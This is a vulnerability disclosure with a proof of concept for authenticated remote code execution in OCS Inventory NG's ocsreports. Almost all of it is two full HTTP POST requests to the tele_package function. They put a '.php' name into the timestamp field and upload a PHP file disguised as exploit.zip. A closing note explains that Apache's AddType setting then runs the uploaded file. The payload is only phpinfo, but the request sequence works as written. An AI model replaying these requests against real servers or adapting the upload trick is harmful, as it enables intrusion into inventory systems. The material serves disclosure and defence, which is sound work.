OCS Inventory NG suffers from an ocsreports authenticated remote code execution vulnerability via a shell upload.
cdb899f87fd086c3c20bd02fe32b2495
## Request 1
This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory.
POST /ocsreports/index.php?function=tele_package HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
Content-Type: multipart/form-data; boundary=---------------------------491299511942
Content-Length: 2836
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------491299511942
Content-Disposition: form-data; name="CSRF_10"
8ab3df2f9a2078530027e74191af0b087429ad41
-----------------------------491299511942
Content-Disposition: form-data; name="document_root"
/usr/share/ocsinventory-reports/ocsreports/
-----------------------------491299511942
Content-Disposition: form-data; name="timestamp"
a.php.a
-----------------------------491299511942
Content-Disposition: form-data; name="NAME"
dshasdgasga
-----------------------------491299511942
Content-Disposition: form-data; name="DESCRIPTION"
asdgasdga
-----------------------------491299511942
Content-Disposition: form-data; name="OS"
WINDOWS
-----------------------------491299511942
Content-Disposition: form-data; name="PROTOCOLE"
HTTP
-----------------------------491299511942
Content-Disposition: form-data; name="PRIORITY"
5
-----------------------------491299511942
Content-Disposition: form-data; name="teledeploy_file"; filename="exploit.zip"
Content-Type: application/x-zip-compressed
<?php
phpinfo();
?>
-----------------------------491299511942
Content-Disposition: form-data; name="ACTION"
EXECUTE
-----------------------------491299511942
Content-Disposition: form-data; name="ACTION_INPUT"
asdgasdgasdg
-----------------------------491299511942
Content-Disposition: form-data; name="REDISTRIB_USE"
0
-----------------------------491299511942
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"
d:\tele_ocs
-----------------------------491299511942
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"
5
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_USER"
0
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_TEXT"
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"
0
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"
0
-----------------------------491299511942
Content-Disposition: form-data; name="NEED_DONE_ACTION"
0
-----------------------------491299511942
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"
-----------------------------491299511942
Content-Disposition: form-data; name="valid"
Send
-----------------------------491299511942
Content-Disposition: form-data; name="digest_algo"
MD5
-----------------------------491299511942
Content-Disposition: form-data; name="digest_encod"
Hexa
-----------------------------491299511942
Content-Disposition: form-data; name="download_rep_creat"
/var/www/html/download/server/
-----------------------------491299511942--
## Request 2
This request renames the file to a.php.a-1 and also creates info file.
POST /ocsreports/index.php?function=tele_package HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 3345
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------4827543632391
Content-Disposition: form-data; name="CSRF_13"
53b6eab749060aa8cbe972e9c9a31ae148cf886b
-----------------------------4827543632391
Content-Disposition: form-data; name="tailleFrag"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="nbfrags"
1
-----------------------------4827543632391
Content-Disposition: form-data; name="comment"
asdgasdga
-----------------------------4827543632391
Content-Disposition: form-data; name="digest"
b14f8d3b56fb10f2257f53ab32947a50
-----------------------------4827543632391
Content-Disposition: form-data; name="VALID_END"
END
-----------------------------4827543632391
Content-Disposition: form-data; name="SIZE"
347
-----------------------------4827543632391
Content-Disposition: form-data; name="document_root"
/usr/share/ocsinventory-reports/ocsreports/
-----------------------------4827543632391
Content-Disposition: form-data; name="timestamp"
a.php.a
-----------------------------4827543632391
Content-Disposition: form-data; name="NAME"
dshasdgasga
-----------------------------4827543632391
Content-Disposition: form-data; name="DESCRIPTION"
-----------------------------4827543632391
Content-Disposition: form-data; name="OS"
WINDOWS
-----------------------------4827543632391
Content-Disposition: form-data; name="PROTOCOLE"
HTTP
-----------------------------4827543632391
Content-Disposition: form-data; name="PRIORITY"
5
-----------------------------4827543632391
Content-Disposition: form-data; name="teledeploy_file"; filename=""
Content-Type: application/octet-stream
-----------------------------4827543632391
Content-Disposition: form-data; name="ACTION"
EXECUTE
-----------------------------4827543632391
Content-Disposition: form-data; name="ACTION_INPUT"
asdgasdgasdg
-----------------------------4827543632391
Content-Disposition: form-data; name="REDISTRIB_USE"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"
d:\tele_ocs
-----------------------------4827543632391
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"
5
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_USER"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_TEXT"
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="NEED_DONE_ACTION"
0
-----------------------------4827543632391
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"
-----------------------------4827543632391
Content-Disposition: form-data; name="digest_algo"
MD5
-----------------------------4827543632391
Content-Disposition: form-data; name="digest_encod"
Hexa
-----------------------------4827543632391
Content-Disposition: form-data; name="download_rep_creat"
/var/www/html/download/server/
-----------------------------4827543632391--
# Apache Config
The application has the following line in the /etc/apache2/conf-available/ocsinventory-reports.conf config file:
AddType application/x-httpd-php .php
Thus any file containing .php substring might be executed by an attacker. Thus the uploaded file is accessible via http://192.168.5.135/ocsreports/a.php.a/a.php.a-1
Reference: https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext
Regards,
Simon Uvarov